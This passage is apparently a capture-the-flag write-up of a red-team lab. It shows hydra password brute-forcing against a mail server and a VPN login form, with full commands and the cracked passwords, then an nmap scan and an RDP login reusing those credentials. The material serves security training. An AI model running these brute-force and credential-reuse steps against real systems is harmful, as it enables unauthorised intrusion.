To breach the perimeter, we target the public-facing VPN server. Given its connection to the internal network, it presents a prime opportunity for initial exploitation.
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]└─$hydra-Lusernames.txt-Ppasswords.txtmail.thereserve.locsmtpHydrav9.5 (c) 2023 by van Hauser/THC &DavidMaciejak-Pleasedonotuseinmilitaryorsecretserviceorganizations,orforillegalpurposes (this isnon-binding,these***ignorelawsandethicsanyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:10[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal![DATA] max16tasksper1server,overall16tasks,10800logintries (l:15/p:720), ~675 tries per task[DATA] attacking smtp://mail.thereserve.loc:25/[STATUS] 986.00 tries/min, 986 tries in 00:01h, 9814 to do in 00:10h, 16 active[STATUS] 1009.67 tries/min, 3029 tries in 00:03h, 7771 to do in 00:08h, 16 active[25][smtp] host: mail.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@[STATUS] 1109.14 tries/min, 7764 tries in 00:07h, 3036 to do in 00:03h, 16 active[25][smtp] host: mail.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1!1of1targetsuccessfullycompleted,2validpasswordsfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:33
We can reuse the same username and password lists to perform a brute-force attack on the VPN login as well.
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone/Capstone_Challenge_Resources]└─$hydra-Lusernames.txt-Ppasswords.txtvpn.thereserve.lochttp-get-form"/login.php:user=^USER^&password=^PASS^:Please check your username or password"-vHydrav9.5 (c) 2023 by van Hauser/THC &DavidMaciejak-Pleasedonotuseinmilitaryorsecretserviceorganizations,orforillegalpurposes (this isnon-binding,these***ignorelawsandethicsanyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-11-12 13:10:02[DATA] max 16 tasks per 1 server, overall 16 tasks, 10800 login tries (l:15/p:720), ~675 tries per task[DATA] attacking http-get-form://vpn.thereserve.loc:80/login.php:user=^USER^&password=^PASS^:Pleasecheckyourusernameorpassword[VERBOSE] Resolving addresses ... [VERBOSE] resolving done[STATUS] 944.00 tries/min, 944 tries in 00:01h, 9856 to do in 00:11h, 16 active[STATUS] 964.67 tries/min, 2894 tries in 00:03h, 7906 to do in 00:09h, 16 active[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php[80][http-get-form] host: vpn.thereserve.loc login: laura.wood@corp.thereserve.loc password: Password1@[STATUS] 1058.43 tries/min, 7409 tries in 00:07h, 3391 to do in 00:04h, 16 active[VERBOSE] Page redirected to http[s]://vpn.thereserve.loc:80/vpncontrol.php[80][http-get-form] host: vpn.thereserve.loc login: mohammad.ahmed@corp.thereserve.loc password: Password1![STATUS] attackfinishedforvpn.thereserve.loc (waiting forchildrentocompletetests)1of1targetsuccessfullycompleted,2validpasswordsfoundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-11-12 13:19:52
Breach
With these accounts, we can attempt to log into the webmail application, the VPN server (to obtain a VPN file assigned to the users), and, if fortunate, potentially gain Active Directory credentials. Ignoring the potential MySQL vulnerabilities for now, we focus on the webmail login.
After successfully logging into both accounts, we find that, unfortunately, nothing useful is located in the mailboxes.
Upon examining the VPN server, we successfully log in and retrieve two `.ovpn` files. The form prompts us to submit an account name. On login, it’s pre-filled with `laura.wood@corp.thereserve.loc`. Testing with my own name in the same format also works successfully.
At the start of the challenge, during the first attempt, the routes were configured correctly, allowing us to successfully reach the internal network IPs 10.200.XXX.21 and 10.200.XXX.22, both of which are WRK machines within the internal network.
WRKX Recon (10.200.XXX.21, 10.200.XXX.22)
Scanning those reveals their FQDN WRK_.corp.thereserve.loc and they have an open RDP port 3389.
An interesting observation is that both machines have Remote Desktop Protocol (RDP, port 3389) open. This suggests that we may be able to log in using the same credentials as their Active Directory accounts if they are consistent.
After the scan, we identify a fourth machine with ports 80 and 443 exposed, serving an HTTP/HTTPS web page. When accessing the IP in the browser, the page loads with a white background, displaying no content or errors.
By checking the source code, we discover that the web page is associated with the Swift Bank web application, as indicated by the static links present in the JavaScript code.
After adding the hostname to the hosts file, we can now successfully access the Swift Bank web application.
We can also run an Nmap scan against the Swift Bank web application to identify any open ports and services that might be exposed.
┌──(kali㉿kali)-[~/Desktop/THM/Red Team Capstone]└─$nmap-sC-sVswift.bank.thereserve.loc-T4StartingNmap7.94SVN ( https://nmap.org ) at 2024-11-12 15:29 ISTNmapscanreportforswift.bank.thereserve.loc (10.200.118.201)Hostisup (0.31s latency).Notshown:997closedtcpports (conn-refused)PORTSTATESERVICEVERSION22/tcpopensshOpenSSH8.2p1Ubuntu4ubuntu0.5 (Ubuntu Linux; protocol2.0)|ssh-hostkey:|30721f:42:2d:f5:4d:c6:fa:41:b1:d9:42:5b:d2:b4:bd:2e (RSA)|2567f:64:d1:9d:6a:5a:a6:6f:c1:85:ff:7a:ae:d0:39:ef (ECDSA)|_256b6:e5:97:2f:47:5d:24:2c:51:84:f0:ea:69:df:58:47 (ED25519)80/tcpopenhttpnginx1.18.0 (Ubuntu)|_http-title:TheReserveOnline|_http-server-header:nginx/1.18.0 (Ubuntu)443/tcpopenssl/https|_http-title:Sitedoesn't have a title (text/plain; charset=utf-8).|_ssl-date: TLS randomness does not represent time| ssl-cert: Subject: commonName=localhost/stateOrProvinceName=Utah/countryName=US| Not valid before: 2022-09-26T13:22:15|_Not valid after: 2023-09-26T13:22:15| tls-alpn: | h2|_ http/1.1| fingerprint-strings: | FourOhFourRequest: | HTTP/1.0 404 Not Found| Content-Type: text/plain; charset=utf-8| Vary: Origin| X-Content-Type-Options: nosniff| Date: Tue, 12 Nov 2024 09:59:40 GMT| Content-Length: 19| page not found| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 400 Bad Request| Content-Type: text/plain; charset=utf-8| Connection: close| Request| GetRequest: | HTTP/1.0 404 Not Found| Content-Type: text/plain; charset=utf-8| Vary: Origin| X-Content-Type-Options: nosniff| Date: Tue, 12 Nov 2024 09:59:36 GMT| Content-Length: 19| page not found| HTTPOptions: | HTTP/1.0 404 Not Found| Content-Type: text/plain; charset=utf-8| Vary: Origin| X-Content-Type-Options: nosniff| Date: Tue, 12 Nov 2024 09:59:38 GMT| Content-Length: 19|_ page not found|_http-cors: GET POST DELETE OPTIONS1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :SF-Port443-TCP:V=7.94SVN%T=SSL%I=7%D=11/12%Time=67332708%P=x86_64-pc-linuxSF:-gnu%r(GetRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:SF:\x20text/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-OSF:ptions:\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:36\x2SF:0GMT\r\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(SF:HTTPOptions,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20teSF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-OptionsSF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:38\x20GMT\rSF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(FourOhSF:FourRequest,BE,"HTTP/1\.0\x20404\x20Not\x20Found\r\nContent-Type:\x20teSF:xt/plain;\x20charset=utf-8\r\nVary:\x20Origin\r\nX-Content-Type-OptionsSF::\x20nosniff\r\nDate:\x20Tue,\x2012\x20Nov\x202024\x2009:59:40\x20GMT\rSF:\nContent-Length:\x2019\r\n\r\n404\x20page\x20not\x20found\n")%r(GeneriSF:cLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/SF:plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20ReSF:quest")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContentSF:-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n4SF:00\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\SF:r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20SF:Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnSF:ection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,SF:67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\SF:x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")SF:%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-TypeSF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2SF:0Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nSF:Content-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\rSF:\n\r\n400\x20Bad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\xSF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectioSF:n:\x20close\r\n\r\n400\x20Bad\x20Request");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 163.31 seconds
It seems that, for now, we are unable to do much with the application, as only ports 22, 80, and 443 are available.
By using Remmina and reusing the credentials of laura.wood, we successfully establish a connection to the WRK1 machine.
Flags 1 - 3
NOTE: We are now able to obtain the following flags by following the instructions on the e-citizen platform:
Flag 1: Breaching the Perimeter
Flag 2: Breaching Active Directory
Flag 3: Foothold on Corporate Division Tier 2 Infrastructure
